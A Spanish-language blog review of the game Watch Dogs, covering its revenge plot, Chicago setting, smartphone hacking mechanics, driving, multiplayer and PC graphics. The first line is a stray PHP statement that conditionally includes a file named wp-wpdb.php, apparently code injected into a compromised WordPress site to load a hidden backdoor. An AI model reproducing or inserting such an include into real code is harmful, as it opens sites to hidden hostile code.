if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Watch Dogs – La Fortaleza de LeChuck

Análisis Watch Dogs

analisis-Watch-dogs-Ubisoft
Mucho ruido ha habido con el juego que analizamos hoy, Watch Dogs, culpa de ello una promoción incesante desde su presentación en el E3 2012, con un espectacular video que prácticamente presentaba los gráficos que ibamos a ver en la nueva generación, pero que en realidad era un juego para Playstation 3 y Xbox 360, puesto que todavía no se habían presentado las consolas de nueva generación.  Llegada la presunta salida del juego el Noviembre pasado, ya se fueron viendo videos donde era evidente el bajón gráfico que había pegado el juego, además de que iba a coincidir con el mayor representante del género de Watch Dogs, y ese es Grand Theft Auto V, con un juego desarrollado durante años y que marcó el año en ventas y crítica. Salir en ese momento, posiblemente, hubiese sido un naufragio tremendo, nadie compra dos «Sand box» seguidos, y el primer escogido iba a ser GTA V por la garantía de sus precedentes frente a una nueva franquicia. Pasaron unos meses y este Mayo ha sido finalmente, el exitoso lanzamiento de Watch Dogs en ventas,  pese a los troleos y críticas constantes por el bajón gráfico del juego. Nosotros, como siempre, vamos a analizarlo todo y sobretodo, la jugabilidad que es lo que más nos importa.

En Watch Dogs nos metemos en el papel de Aiden Pearce, un hacker que se ve envuelto en una serie de ajustes de cuentas que acaban con su sobrina fallecida en un accidente provocado. Con la ayuda de otros hackers intentará encontrar a los culpables de tal hecho, desenmascarando poco a poco la corrupción en Chicago gracias a una ciudad interconectada donde la búsqueda de información será su mejor aliado gracias a sus habilidades y su smartphone. Sí, la típica historia de venganza, pero te mantiene enganchado hasta el final.

Como todo Sandbox, estamos ante un nuevo juego que nos brinda libertad de movimientos ante toda una ciudad, esta vez tomando Chicago como base. Partiendo de ahí, he de decir que Watch Dogs tiene mucho trabajo detrás y muchos detalles, diferentes a los de Grand Theft Auto (Sí, quizás que haga sombra tu cuerpo proyectando la luz de los faros de un coche no es uno de ellos) pero igualmente válidos, y es que, el mundo de los sandbox no tiene porque girar alrededor de Grand Theft Auto. Ya Sleeping Dogs demostró que se puede hacer un sandbox bueno siendo diferente a GTA, y creo que Watch Dogs también ha intentado tener identidad propia y no ser un clon más de GTA, con sus ventajas e inconvenientes. En este caso, la historia y misiones principales, se me hacen bastante más interesantes que en Grand Theft Auto, al contrario de las secundarias, que en Watch Dogs me dan la sensación de ser puro relleno del mapa, cosa que sucede a menudo en el género (Vamos, que con GTA también pasa).

En cuanto al mapeado puedo decir que es una de las ciudades más grandes que he visto en un videojuego, y no me refiero al mapa en sí, si no a la ciudad, pues la Chicago que representa Watch Dogs me ha parecido más grande y detallada que por ejemplo «Los Santos» en Grand Theft Auto V, que era más grande en extensión pero encontrábamos tierra en la mayor parte del mapeado, cosa que no es ni bueno ni malo, solo diferente. En Watch Dogs también tenemos alguna zona más campestre, pero en general la protagonista es la ciudad.

Watch-Dogs-Ultra-PC-2

Tampoco quiero que este análisis se convierta en una comparativa de Watch Dogs con GTA, sinceramente pienso que el juego que tratamos hoy tiene personalidad propia. Uno de las grandes diferencias respecto a anteriores juegos del género es sobre lo que precisamente gira este Watch Dogs, el hackeo y nuestro smartphone. Continuamente podremos ver lo que tenemos alrededor «hackeable» o identificable con tan solo acercarnos un poco. Identificar a las personas será útil en las misiones primarias, y algunas secundarias, también podremos hackear las conversaciones de algunos por mensajes o por voz, además de llevarnos los datos de su cuenta bancaria e ir a retirar el dinero en un cajero… Todo son detalles que solo hemos visto en Watch Dogs, y os digo, eso tiene mucho trabajo detrás y se disfruta. Otra de las cosas interesantes que podremos hacer con nuestros «poderes» será el poder modificar el comportamiento de cierto mobiliario electrónico urbano. Por ejemplo, cuando vamos en coche solemos interactuar con los semáforos, para ponerlos todos en verde y causar  un posible tapón para nuestros perseguidores, bolardos que levantándolos justo tras nuestro paso también serán útiles para el mismo caso, sucediendo de igual manera con los puentes levadizos.

A todo esto, todavía le sumamos otros objetos que también podremos activar y utilizar gracias a nuestro smartphone. Tuberías que explotan, ascensores, diferentes máquinas, alarmas de coche, parapetos automatizados que podremos activar para nuestro bien, cámaras con las que podemos ver desde las alturas a los enemigos y sus movimientos, además de movernos entre ellas para avanzar hacia un posible hackeo de datos donde usando al personaje nos descubrirían. En definitiva, un montón de funciones que hacen que las partidas se tornen lo suficientemente divertidas y originales como para decir que Watch dogs se deja disfrutar sin repetir la jugabilidad de otros juegos.

La conducción en Watch Dogs se mantiene, al igual que otros sandbox, entre la simulación y el arcade. En cuanto te acostumbras, va como un guante. Simplemente no pretenden que te la pegues cada dos por tres, pero tampoco que no uses el freno en ningún momento.

Watch-Dogs-Ultra-PC-4

Hablando de los modos multijugador Online, tiene algunas variantes más bien típicas (Carreras de coches, duelos, etc), siendo la más interesante la que más pega con la identidad del juego la de «hackeo», donde tendremos que hackear a otro jugador su smartphone mientras nos ocultamos de el en un radio donde podamos descargar la información. Bastante divertido y original, aunque parecido al de Assassin’s Creed.

Apartado Técnico

Sin duda, lo más criticado y esperado de Watch Dogs ha sido el aparatado gráfico. Watch Dogs se ve muy bien, pero peor de lo que se enseñó y ese es su peor enemigo, lo cual ha pesado mucho durante meses en la conciencia de los desarrolladores. Finalmente no ha sido posible ese nivel, y se nota, pero Watch Dogs sigue rayando a gran altura. Una de las cosas que para mí determinan más la calidad visual de un título es la iluminación, sobretodo si el juego tiene un concepto realista, y en Watch Dogs está queda muy bien y todo se sombrea perfectamente.

El agua también está muy bien recreada. La lluvia es una auténtica pasada, tanto ver todo mojado como la propia lluvia caer, de las mejores que haya visto. Aunque el mar carece de oleaje, veremos las diferentes tonalidades de color del según el estado del agua, con agua más verde, por ejemplo, en los puertos por la contaminación. Los reflejos de la ciudad en el agua en tiempo real también añaden otro punto de calidad al título, que por otro lado se echan en falta algunos reflejos reales en la ciudad, pues ver la fachada de un edificio acristalado con un reflejo de una carretera perpendicular que no tiene nada que ver con lo que tiene delante y otros detalles denotan que no tiene ese punto de «locura» por el detalle al que llegaba Grand Theft Auto V. Aún así, no hemos visto tal comportamiento de la gente por la calle en ningún otro juego, añadiendo la posibilidad de saber más de ellos por la identificación a través del smartphone, cosa que lo hace todo todavía más «humano» y real. Quizás haberlo jugado en PC en configuración visual «Ultra» tenía que haber dado más diferenciación respecto a ajustes inferiores que no he notado.

Watch-Dogs-PC-Ultra-3

Watch Dogs es un título muy recomendable, criticado por su bajón gráfico, por algunos defectos también técnicos, pero que en realidad esconden un juego completo, una gran aventura de unas 15 horas, sin contar todas las misiones secundarias que uno puede hacer, que nos mantendrá enganchados de principio a fin. Como os digo, no os dejéis llevar sin probarlo vosotros mismos, vale mucho la pena. Los sandbox viven siempre tras la sombra de Grand Theft Auto V, pero los más críticos con este saben que hay mucho más que se puede ofrecer, y Watch Dogs ofrece cosas distintas.

Si quieres comprar Watch Dogs al mejor precio lo puedes hacer aquí.